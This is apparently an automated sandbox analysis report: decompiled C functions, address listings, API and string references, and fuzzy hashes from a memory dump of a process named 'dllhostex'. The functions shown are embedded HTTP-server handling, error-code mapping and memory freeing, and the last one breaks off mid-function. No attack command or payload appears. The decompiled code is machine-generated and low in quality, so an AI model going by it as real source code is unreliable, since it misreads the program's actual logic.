                                                0x01351f58
                                                0x01351f5b
                                                0x01351f5d
                                                0x01351f62
                                                0x01351f67
                                                0x01351f70
                                                0x01351f77
                                                0x01351f7c
                                                0x01351f7f
                                                0x01351f83
                                                0x01351f8f
                                                0x01351f94
                                                0x01351f99
                                                0x01351f9e
                                                0x01351fa0
                                                0x01351fa7
                                                0x01351fac
                                                0x01351faf
                                                0x01351fb3
                                                0x01351fbf
                                                0x01351fc1
                                                0x01351fc1
                                                0x01351ff6
                                                0x01351ffe
                                                0x01352003
                                                0x01352008
                                                0x013520a5
                                                0x013520a9
                                                0x013520b0
                                                0x013520b1
                                                0x013520b6
                                                0x013520c2
                                                0x013520d3
                                                0x0135200e
                                                0x0135200e
                                                0x01352012
                                                0x01352014
                                                0x01352018
                                                0x00000000
                                                0x0135201e
                                                0x01352028
                                                0x01352028
                                                0x01352018
                                                0x01352008
                                                0x00000000
                                                0x01351f40
                                                0x00000000
                                                0x01351f20
                                                0x00000000

                                                APIs
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F2C
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F36
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F5D
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F77
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351F94
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FA7
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FC7
                                                • ___from_strstr_to_strchr.LIBCMT ref: 01351FDA
                                                Strings
                                                • <html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>, xrefs: 013520B6
                                                • Not enough memory in pool to allocate header record!, xrefs: 013520A9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___from_strstr_to_strchr
                                                • String ID: <html><head><title>Request too big</title></head><body>Your HTTP header was too big for the memory constraints of this webserver.</body></html>$Not enough memory in pool to allocate header record!
                                                • API String ID: 601868998-3379078092
                                                • Opcode ID: a4bf4a150cd5b7925a132f421affb1b7eebaffdd1fed21e378089c0768a1ba77
                                                • Instruction ID: db80bb7901eca2d94cef7f59c69fe064d43305fbeb8997ca099125a42632501f
                                                • Opcode Fuzzy Hash: a4bf4a150cd5b7925a132f421affb1b7eebaffdd1fed21e378089c0768a1ba77
                                                • Instruction Fuzzy Hash: BF51E235600302AFEB51AA2DDC44F6F7BD9EF95A4CF050468FD44C7252EB26E909CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01351510 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 124threadCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 25%
                                                			E01351510(void* __ecx, char* __edx, intOrPtr _a4) {
				void* __esi;
				intOrPtr _t30;
				intOrPtr _t32;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t55;
				struct _CRITICAL_SECTION* _t57;
				intOrPtr _t58;
				char* _t62;

				_t52 = __edx;
				_t53 = __ecx;
				_t62 = __edx;
				if(__ecx == 0) {
					L30:
					return 0;
				} else {
					_t46 = _a4;
					if(_t46 == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) != 0) {
						goto L30;
					} else {
						_t30 =  *((intOrPtr*)(__ecx + 0xac));
						if(_t30 == 4 || _t30 == 9) {
							_t55 =  *((intOrPtr*)(_t53 + 0x10));
							if( *((char*)(_t55 + 0xc4)) != 0) {
								L29:
								return 1;
							} else {
								if( *((char*)(_t53 + 0xdc)) != 0 || ( *(_t55 + 0xe4) & 0x00000008) == 0 || GetCurrentThreadId() ==  *((intOrPtr*)(_t53 + 0x54))) {
									_t32 =  *((intOrPtr*)(_t46 + 0x14));
									if(_t32 == 0 || ( *(_t55 + 0xe4) & 0x00008000) != 0) {
										if(_t62 == 0x65 || _t32 == 0) {
											_t57 = _t46 + 0x1c;
											EnterCriticalSection(_t57);
											 *((intOrPtr*)(_t46 + 0x58)) =  *((intOrPtr*)(_t46 + 0x58)) + 1;
											LeaveCriticalSection(_t57);
											_t58 =  *((intOrPtr*)(_t53 + 0x2c));
											 *((intOrPtr*)(_t53 + 0x1c)) = _t46;
											 *((intOrPtr*)(_t53 + 0xb4)) = _t62;
											if(_t58 == 0) {
												L18:
												if(_t62 < 0xc8 || _t62 == 0xcc || _t62 == 0x130) {
													goto L21;
												}
											} else {
												_t52 = "HEAD";
												if(E01352220(_t58, "HEAD") != 0) {
													L21:
													 *((intOrPtr*)(_t53 + 0x78)) =  *((intOrPtr*)(_t46 + 0x38));
													 *((intOrPtr*)(_t53 + 0x7c)) =  *((intOrPtr*)(_t46 + 0x3c));
												} else {
													goto L18;
												}
											}
											if( *((intOrPtr*)(_t53 + 0xac)) == 4 && _t58 != 0) {
												_t52 = "POST";
												if(E01352220(_t58, "POST") != 0) {
													L26:
													 *((char*)(_t53 + 0xa5)) = 1;
													 *((intOrPtr*)(_t53 + 0xac)) = 9;
												} else {
													_t52 = "PUT";
													if(E01352220(_t58, "PUT") != 0) {
														goto L26;
													}
												}
											}
											if( *((char*)(_t53 + 0xa7)) == 0) {
												E01350CD0(_t53, _t52, _t58);
											}
											goto L29;
										} else {
											_push("Application used invalid status code for \'upgrade\' response!\n");
											_push(_t55);
											E01351E90();
											return 0;
										}
									} else {
										_push("Attempted \'upgrade\' connection on daemon without MHD_ALLOW_UPGRADE option!\n");
										_push(_t55);
										E01351E90();
										return 0;
									}
								} else {
									_push("Attempted to queue response on wrong thread!\n");
									_push(_t55);
									E01351E90();
									return 0;
								}
							}
						} else {
							goto L30;
						}
					}
				}
			}












                                                0x01351510
                                                0x01351513
                                                0x01351515
                                                0x01351519
                                                0x01351687
                                                0x0135168a
                                                0x0135151f
                                                0x0135151f
                                                0x01351525
                                                0x00000000
                                                0x01351535
                                                0x01351535
                                                0x0135153e
                                                0x0135154a
                                                0x01351554
                                                0x0135167b
                                                0x01351684
                                                0x0135155a
                                                0x01351561
                                                0x0135158f
                                                0x01351594
                                                0x013515ba
                                                0x013515d5
                                                0x013515d9
                                                0x013515df
                                                0x013515e3
                                                0x013515e9
                                                0x013515ec
                                                0x013515ef
                                                0x013515f7
                                                0x01351609
                                                0x0135160f
                                                0x00000000
                                                0x00000000
                                                0x013515f9
                                                0x013515f9
                                                0x01351607
                                                0x01351621
                                                0x01351624
                                                0x0135162a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01351607
                                                0x01351634
                                                0x0135163a
                                                0x01351648
                                                0x0135165a
                                                0x0135165a
                                                0x01351661
                                                0x0135164a
                                                0x0135164a
                                                0x01351658
                                                0x00000000
                                                0x00000000
                                                0x01351658
                                                0x01351648
                                                0x01351672
                                                0x01351676
                                                0x01351676
                                                0x00000000
                                                0x013515c0
                                                0x013515c0
                                                0x013515c5
                                                0x013515c6
                                                0x013515d4
                                                0x013515d4
                                                0x013515a2
                                                0x013515a2
                                                0x013515a7
                                                0x013515a8
                                                0x013515b6
                                                0x013515b6
                                                0x0135157a
                                                0x0135157a
                                                0x0135157f
                                                0x01351580
                                                0x0135158e
                                                0x0135158e
                                                0x01351561
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0135153e
                                                0x01351525

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 0135156F
                                                • EnterCriticalSection.KERNEL32(00000000), ref: 013515D9
                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 013515E3
                                                Strings
                                                • Attempted 'upgrade' connection on daemon without MHD_ALLOW_UPGRADE option!, xrefs: 013515A2
                                                • Application used invalid status code for 'upgrade' response!, xrefs: 013515C0
                                                • Attempted to queue response on wrong thread!, xrefs: 0135157A
                                                • PUT, xrefs: 0135164A
                                                • POST, xrefs: 0135163A
                                                • HEAD, xrefs: 013515F9
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                                • String ID: Application used invalid status code for 'upgrade' response!$Attempted 'upgrade' connection on daemon without MHD_ALLOW_UPGRADE option!$Attempted to queue response on wrong thread!$HEAD$POST$PUT
                                                • API String ID: 2351996187-4085994173
                                                • Opcode ID: 6de4cb9ed4e56b833ed6983416a554135043fddcfb8ba714c0c4f8433c50e46d
                                                • Instruction ID: 3e534f3341f99184ae74d25ddc292a01dc068b4c84a9d36171d81eb18e40c936
                                                • Opcode Fuzzy Hash: 6de4cb9ed4e56b833ed6983416a554135043fddcfb8ba714c0c4f8433c50e46d
                                                • Instruction Fuzzy Hash: 4A417B327017029FFBE69A2DE880F7AB7A4AF40F3DF08012AEE15C2201D775D4558BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013488E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 188windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E013488E0(void* __ebx, long __ecx, void* __edx, void* __edi, void* __esi) {
				char _v4;
				char _t16;
				void* _t17;
				void* _t19;
				void* _t41;
				long _t42;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;
				long _t50;

				_t48 = __edx;
				_t42 = __ecx;
				_v4 = 0;
				_t50 = __ecx;
				_t41 = __edx;
				FormatMessageA(0x1300, 0, __ecx, 0x400,  &_v4, 0, 0);
				_t16 = _v4;
				_t53 =  !=  ? _t16 : "Unknown error";
				_t17 = E0135B8FA(2);
				_push( !=  ? _t16 : "Unknown error");
				_push(_t50);
				if(_t41 == 0) {
					_push("(%d) %s");
					_push(_t17);
					E012938B0(_t42);
				} else {
					E012938B0(_t42, _t17, "%s: (%d) %s", _t41);
				}
				_t19 = _v4;
				if(_t19 != 0) {
					LocalFree(_t19);
				}
				DebugBreak();
				E0135EBB9(_t41, _t42, _t48, _t50, _t53);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				if(_t42 > 0) {
					__eflags = _t42 - 0x10b;
					if(__eflags > 0) {
						__eflags = _t42 - 0x1128;
						if(__eflags > 0) {
							__eflags = _t42 - 0x2af9;
							if(__eflags > 0) {
								__eflags = _t42 - 0x2afc;
								if(_t42 == 0x2afc) {
									goto L73;
								} else {
									goto L72;
								}
							} else {
								if(__eflags == 0) {
									goto L73;
								} else {
									_t43 = _t42 + 0xffffd8ec;
									__eflags = _t43 - 0x3d;
									if(_t43 > 0x3d) {
										goto L72;
									} else {
										switch( *((intOrPtr*)(( *(_t43 + 0x1348e1c) & 0x000000ff) * 4 +  &M01348DBC))) {
											case 0:
												goto L56;
											case 1:
												goto L29;
											case 2:
												goto L60;
											case 3:
												goto L42;
											case 4:
												goto L63;
											case 5:
												return 0xfffff008;
												goto L74;
											case 6:
												return 0xfffff00c;
												goto L74;
											case 7:
												return 0xfffff02e;
												goto L74;
											case 8:
												return 0xfffff01f;
												goto L74;
											case 9:
												return 0xfffff033;
												goto L74;
											case 0xa:
												return 0xfffff007;
												goto L74;
											case 0xb:
												goto L51;
											case 0xc:
												return 0xfffff006;
												goto L74;
											case 0xd:
												goto L65;
											case 0xe:
												goto L57;
											case 0xf:
												goto L59;
											case 0x10:
												return 0xfffff024;
												goto L74;
											case 0x11:
												return 0xfffff01b;
												goto L74;
											case 0x12:
												goto L46;
											case 0x13:
												goto L68;
											case 0x14:
												goto L70;
											case 0x15:
												goto L58;
											case 0x16:
												goto L61;
											case 0x17:
												goto L72;
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								goto L73;
							} else {
								__eflags = _t42 - 0x3e3;
								if(__eflags > 0) {
									__eflags = _t42 - 0x522;
									if(__eflags > 0) {
										__eflags = _t42 - 0x781;
										if(__eflags > 0) {
											__eflags = _t42 - 0x8ca;
											if(_t42 != 0x8ca) {
												goto L72;
											} else {
												L46:
												return 0xfffff02b;
											}
										} else {
											if(__eflags == 0) {
												return 0xfffff01d;
											} else {
												_t44 = _t42 - 0x571;
												__eflags = _t44;
												if(_t44 == 0) {
													goto L43;
												} else {
													__eflags = _t44 != 0x47;
													if(_t44 != 0x47) {
														goto L72;
													} else {
														goto L42;
													}
												}
											}
										}
									} else {
										if(__eflags == 0) {
											goto L37;
										} else {
											_t46 = _t42 + 0xfffffc1a;
											__eflags = _t46 - 0xee;
											if(_t46 > 0xee) {
												goto L72;
											} else {
												switch( *((intOrPtr*)(( *(_t46 + 0x1348ccc) & 0x000000ff) * 4 +  &M01348CA0))) {
													case 0:
														goto L29;
													case 1:
														goto L34;
													case 2:
														goto L36;
													case 3:
														goto L43;
													case 4:
														return 0xfffff010;
														goto L74;
													case 5:
														L58:
														return 0xfffff012;
														goto L74;
													case 6:
														L51:
														return 0xfffff005;
														goto L74;
													case 7:
														L65:
														return 0xfffff022;
														goto L74;
													case 8:
														L61:
														return 0xfffff017;
														goto L74;
													case 9:
														L57:
														return 0xfffff011;
														goto L74;
													case 0xa:
														goto L72;
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L56:
										return 0xfffff00f;
									} else {
										__eflags = _t42 - 0x115;
										if(_t42 == 0x115) {
											goto L36;
										} else {
											__eflags = _t42 - 0x2e4;
											if(_t42 != 0x2e4) {
												goto L72;
											} else {
												L29:
												return 0xfffff004;
											}
										}
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							L73:
							return 0xfffff026;
						} else {
							_t47 = _t42 - 1;
							__eflags = _t47 - 0xe8;
							if(_t47 > 0xe8) {
								L72:
								return 0xfffff002;
							} else {
								switch( *((intOrPtr*)(( *(_t47 + 0x1348bb4) & 0x000000ff) * 4 +  &M01348B58))) {
									case 0:
										return 0xfffff01c;
										goto L74;
									case 1:
										goto L73;
									case 2:
										L63:
										return 0xfffff01e;
										goto L74;
									case 3:
										L37:
										return 0xfffff030;
										goto L74;
									case 4:
										L34:
										return 0xfffff00d;
										goto L74;
									case 5:
										return 0xfffff027;
										goto L74;
									case 6:
										L42:
										return 0xfffff019;
										goto L74;
									case 7:
										return 0xfffff03b;
										goto L74;
									case 8:
										return 0xfffff035;
										goto L74;
									case 9:
										L43:
										return 0xfffff01a;
										goto L74;
									case 0xa:
										return 0xfffff00e;
										goto L74;
									case 0xb:
										L36:
										return 0xfffff029;
										goto L74;
									case 0xc:
										return 0xfffff02f;
										goto L74;
									case 0xd:
										L59:
										return 0xfffff013;
										goto L74;
									case 0xe:
										return 0xfffff015;
										goto L74;
									case 0xf:
										return 0xfffff001;
										goto L74;
									case 0x10:
										L60:
										return 0xfffff016;
										goto L74;
									case 0x11:
										L70:
										return 0xfffff039;
										goto L74;
									case 0x12:
										return 0xfffff02d;
										goto L74;
									case 0x13:
										return 0xfffff020;
										goto L74;
									case 0x14:
										return 0xfffff003;
										goto L74;
									case 0x15:
										L68:
										return 0xfffff031;
										goto L74;
									case 0x16:
										goto L72;
								}
							}
						}
					}
				} else {
					return _t42;
				}
				L74:
			}














                                                0x013488e0
                                                0x013488e0
                                                0x013488ee
                                                0x013488fc
                                                0x013488fe
                                                0x01348908
                                                0x0134890e
                                                0x0134891b
                                                0x0134891e
                                                0x01348926
                                                0x01348927
                                                0x0134892a
                                                0x0134893d
                                                0x01348942
                                                0x01348943
                                                0x0134892c
                                                0x01348933
                                                0x01348938
                                                0x0134894b
                                                0x01348951
                                                0x01348954
                                                0x01348954
                                                0x0134895a
                                                0x01348960
                                                0x01348965
                                                0x01348966
                                                0x01348967
                                                0x01348968
                                                0x01348969
                                                0x0134896a
                                                0x0134896b
                                                0x0134896c
                                                0x0134896d
                                                0x0134896e
                                                0x0134896f
                                                0x01348972
                                                0x01348977
                                                0x0134897d
                                                0x013489e2
                                                0x013489e8
                                                0x01348a9d
                                                0x01348aa3
                                                0x01348b44
                                                0x01348b4a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348aa9
                                                0x01348aa9
                                                0x00000000
                                                0x01348aaf
                                                0x01348aaf
                                                0x01348ab5
                                                0x01348ab8
                                                0x00000000
                                                0x01348abe
                                                0x01348ac5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348ae3
                                                0x00000000
                                                0x00000000
                                                0x01348ae9
                                                0x00000000
                                                0x00000000
                                                0x01348b31
                                                0x00000000
                                                0x00000000
                                                0x01348b1f
                                                0x00000000
                                                0x00000000
                                                0x01348b3d
                                                0x00000000
                                                0x00000000
                                                0x01348add
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348ad7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348b2b
                                                0x00000000
                                                0x00000000
                                                0x01348b13
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348ac5
                                                0x01348ab8
                                                0x01348aa9
                                                0x013489ee
                                                0x013489ee
                                                0x00000000
                                                0x013489f4
                                                0x013489f4
                                                0x013489fa
                                                0x01348a1c
                                                0x01348a22
                                                0x01348a5e
                                                0x01348a64
                                                0x01348a8b
                                                0x01348a91
                                                0x00000000
                                                0x01348a97
                                                0x01348a97
                                                0x01348a9c
                                                0x01348a9c
                                                0x01348a66
                                                0x01348a66
                                                0x01348a8a
                                                0x01348a68
                                                0x01348a68
                                                0x01348a68
                                                0x01348a6e
                                                0x00000000
                                                0x01348a70
                                                0x01348a70
                                                0x01348a73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a73
                                                0x01348a6e
                                                0x01348a66
                                                0x01348a24
                                                0x01348a24
                                                0x00000000
                                                0x01348a26
                                                0x01348a26
                                                0x01348a2c
                                                0x01348a32
                                                0x00000000
                                                0x01348a38
                                                0x01348a3f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a51
                                                0x00000000
                                                0x00000000
                                                0x01348af6
                                                0x01348afb
                                                0x00000000
                                                0x00000000
                                                0x01348acc
                                                0x01348ad1
                                                0x00000000
                                                0x00000000
                                                0x01348b20
                                                0x01348b25
                                                0x00000000
                                                0x00000000
                                                0x01348b08
                                                0x01348b0d
                                                0x00000000
                                                0x00000000
                                                0x01348af0
                                                0x01348af5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348a3f
                                                0x01348a32
                                                0x01348a24
                                                0x013489fc
                                                0x013489fc
                                                0x01348aea
                                                0x01348aef
                                                0x01348a02
                                                0x01348a02
                                                0x01348a08
                                                0x00000000
                                                0x01348a0a
                                                0x01348a0a
                                                0x01348a10
                                                0x00000000
                                                0x01348a16
                                                0x01348a16
                                                0x01348a1b
                                                0x01348a1b
                                                0x01348a10
                                                0x01348a08
                                                0x013489fc
                                                0x013489fa
                                                0x013489ee
                                                0x0134897f
                                                0x0134897f
                                                0x01348b52
                                                0x01348b57
                                                0x01348985
                                                0x01348985
                                                0x01348986
                                                0x0134898c
                                                0x01348b4c
                                                0x01348b51
                                                0x01348992
                                                0x01348999
                                                0x00000000
                                                0x013489db
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348b14
                                                0x01348b19
                                                0x00000000
                                                0x00000000
                                                0x01348a58
                                                0x01348a5d
                                                0x00000000
                                                0x00000000
                                                0x01348a46
                                                0x01348a4b
                                                0x00000000
                                                0x00000000
                                                0x013489b7
                                                0x00000000
                                                0x00000000
                                                0x01348a79
                                                0x01348a7e
                                                0x00000000
                                                0x00000000
                                                0x013489d5
                                                0x00000000
                                                0x00000000
                                                0x013489cf
                                                0x00000000
                                                0x00000000
                                                0x01348a7f
                                                0x01348a84
                                                0x00000000
                                                0x00000000
                                                0x013489a5
                                                0x00000000
                                                0x00000000
                                                0x01348a52
                                                0x01348a57
                                                0x00000000
                                                0x00000000
                                                0x013489c3
                                                0x00000000
                                                0x00000000
                                                0x01348afc
                                                0x01348b01
                                                0x00000000
                                                0x00000000
                                                0x013489ab
                                                0x00000000
                                                0x00000000
                                                0x013489c9
                                                0x00000000
                                                0x00000000
                                                0x01348b02
                                                0x01348b07
                                                0x00000000
                                                0x00000000
                                                0x01348b3e
                                                0x01348b43
                                                0x00000000
                                                0x00000000
                                                0x013489bd
                                                0x00000000
                                                0x00000000
                                                0x013489b1
                                                0x00000000
                                                0x00000000
                                                0x013489e1
                                                0x00000000
                                                0x00000000
                                                0x01348b32
                                                0x01348b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01348999
                                                0x0134898c
                                                0x0134897f
                                                0x01348974
                                                0x01348976
                                                0x01348976
                                                0x00000000

                                                APIs
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000400,?), ref: 01348908
                                                • LocalFree.KERNEL32(?), ref: 01348954
                                                • DebugBreak.KERNEL32 ref: 0134895A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BreakDebugFormatFreeLocalMessage
                                                • String ID: %s: (%d) %s$(%d) %s$Unknown error$UnregisterWaitEx
                                                • API String ID: 293130274-604287766
                                                • Opcode ID: bc8a39a14e5dcacf3229bdb7a6cd1931f7bac85704cb4a0455dc80ee937c32f6
                                                • Instruction ID: a2c9da4cf0cb2f3e0c6e77c596c225d6f407f526bb5ad4c802834b6be40cd6fc
                                                • Opcode Fuzzy Hash: bc8a39a14e5dcacf3229bdb7a6cd1931f7bac85704cb4a0455dc80ee937c32f6
                                                • Instruction Fuzzy Hash: 64416F5CA01D4157EF2887BC5C6462939D4BF90B29FCC0BE8B629D6BF4D3ACEC406115
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0136E838 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0136E838(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0136E582(_t45, 7);
					E0136E582(_t45 + 0x1c, 7);
					E0136E582(_t45 + 0x38, 0xc);
					E0136E582(_t45 + 0x68, 0xc);
					E0136E582(_t45 + 0x98, 2);
					E013656E2( *((intOrPtr*)(_t45 + 0xa0)));
					E013656E2( *((intOrPtr*)(_t45 + 0xa4)));
					E013656E2( *((intOrPtr*)(_t45 + 0xa8)));
					E0136E582(_t45 + 0xb4, 7);
					E0136E582(_t45 + 0xd0, 7);
					E0136E582(_t45 + 0xec, 0xc);
					E0136E582(_t45 + 0x11c, 0xc);
					E0136E582(_t45 + 0x14c, 2);
					E013656E2( *((intOrPtr*)(_t45 + 0x154)));
					E013656E2( *((intOrPtr*)(_t45 + 0x158)));
					E013656E2( *((intOrPtr*)(_t45 + 0x15c)));
					return E013656E2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                0x0136e83e
                                                0x0136e843
                                                0x0136e84c
                                                0x0136e857
                                                0x0136e862
                                                0x0136e86d
                                                0x0136e87b
                                                0x0136e886
                                                0x0136e891
                                                0x0136e89c
                                                0x0136e8aa
                                                0x0136e8b8
                                                0x0136e8c9
                                                0x0136e8d7
                                                0x0136e8e5
                                                0x0136e8f0
                                                0x0136e8fb
                                                0x0136e906
                                                0x00000000
                                                0x0136e916
                                                0x0136e91b

                                                APIs
                                                  • Part of subcall function 0136E582: _free.LIBCMT ref: 0136E5A7
                                                • _free.LIBCMT ref: 0136E886
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136E891
                                                • _free.LIBCMT ref: 0136E89C
                                                • _free.LIBCMT ref: 0136E8F0
                                                • _free.LIBCMT ref: 0136E8FB
                                                • _free.LIBCMT ref: 0136E906
                                                • _free.LIBCMT ref: 0136E911
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d88494da7d7ae054f2fc9a1e636b90c94f4d2051a51bd66432de367e38d34c7d
                                                • Instruction ID: ebd5affeb201d0c347a020923443b74fcd5f3d4ff6ae480240c4c9e46c4bfa2c
                                                • Opcode Fuzzy Hash: d88494da7d7ae054f2fc9a1e636b90c94f4d2051a51bd66432de367e38d34c7d
                                                • Instruction Fuzzy Hash: 75116D39542B1AEAD520FBB8CC45FCB7B9D5F10748F80CC35A39B67054EA24EA098A50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013490A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 224COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 40%
                                                			E013490A0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				intOrPtr _v24;
				char _v28;
				struct _CRITICAL_SECTION* _v32;
				void* __esi;
				signed int _t57;
				signed int _t59;
				intOrPtr _t61;
				struct _CRITICAL_SECTION* _t62;
				signed int* _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				void* _t68;
				signed int _t70;
				signed int _t71;
				void* _t78;
				intOrPtr _t85;
				signed int _t87;
				signed int** _t93;
				signed int _t94;
				signed int* _t95;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				intOrPtr* _t109;
				signed int* _t111;
				signed int* _t112;
				signed int _t113;
				signed int _t114;
				signed int** _t116;
				signed int _t118;

				_t105 = __edx;
				_t118 =  &_v32;
				_t57 =  *0x13cc074; // 0x4132269f
				_v4 = _t57 ^ _t118;
				_t113 = __ecx;
				_t59 =  *(__ecx + 0x60);
				if(_t59 == 0) {
					L3:
					if( *((intOrPtr*)(_t113 + 0xe0)) == 0) {
						L64:
						return E01353717(_v4 ^ _t118, _t113);
					}
					_t61 = _a4;
